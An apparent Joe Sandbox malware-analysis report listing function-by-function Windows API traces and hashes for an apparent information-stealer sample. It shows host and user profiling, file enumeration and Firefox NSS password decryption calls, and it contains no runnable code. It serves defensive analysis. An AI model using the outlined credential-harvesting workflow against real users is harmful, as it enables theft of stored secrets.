                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                                                              • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                              • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                              • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F85F0), ref: 00412AD8
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2699682494-0
                                                                                                                                                                                                                              • Opcode ID: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
                                                                                                                                                                                                                              • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                              • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                              • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
                                                                                                                                                                                                                              • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                                                                              • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                              • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                                                                                                              • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                              • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                              • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                              • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,6BBBE2A6), ref: 6BBBE35E
                                                                                                                                                                                                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BBBE2A6), ref: 6BBBE386
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBE3E4
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE3F1
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6BBBE4AB
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE4F5
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBE577
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE584
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE5DE
                                                                                                                                                                                                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BBBE8A6
                                                                                                                                                                                                                                • Part of subcall function 6BB7B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BB7B7CF
                                                                                                                                                                                                                                • Part of subcall function 6BB7B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BB7B808
                                                                                                                                                                                                                                • Part of subcall function 6BBCB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BBF0FB6,00000000,?,?,6BBBE69E), ref: 6BBCB830
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000000), ref: 6BBBE6DA
                                                                                                                                                                                                                                • Part of subcall function 6BBCB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BBCB916
                                                                                                                                                                                                                                • Part of subcall function 6BBCB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BBCB94A
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BBBE864
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBE883
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                                                                                                                                                                              • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                              • API String ID: 2698983630-53385798
                                                                                                                                                                                                                              • Opcode ID: 49c3f48f5661636cbc08f1af294e75274f3f0e39959e6fa91f29cbfd1de61eb5
                                                                                                                                                                                                                              • Instruction ID: c3e79778c7942e3453daa8d3173fc5522ac4ee1fe6f6df6f11fc466d32600f9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49c3f48f5661636cbc08f1af294e75274f3f0e39959e6fa91f29cbfd1de61eb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0402AC75A043859FCB14CF28C480A6EBBF9FF89304F04496CE95A9B351DB39E945CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00412314
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F0A18), ref: 00412339
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F76C0), ref: 0041234C
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00412359
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0041236A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                                                                                                              • Opcode ID: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
                                                                                                                                                                                                                              • Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a12d10b0853cdca75f850272d177170673b34ecfbac75b41269a42e2db7d2f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,042F0958), ref: 0040BFE1
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                              • PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3428224297-0
                                                                                                                                                                                                                              • Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                              • Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DB1C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                              • String ID: [@$\*.*
                                                                                                                                                                                                                              • API String ID: 2325840235-1445036518
                                                                                                                                                                                                                              • Opcode ID: a10415128f82763c69118b784d5d9ef3f316688badd4acd86b2481b435ac45e2
                                                                                                                                                                                                                              • Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
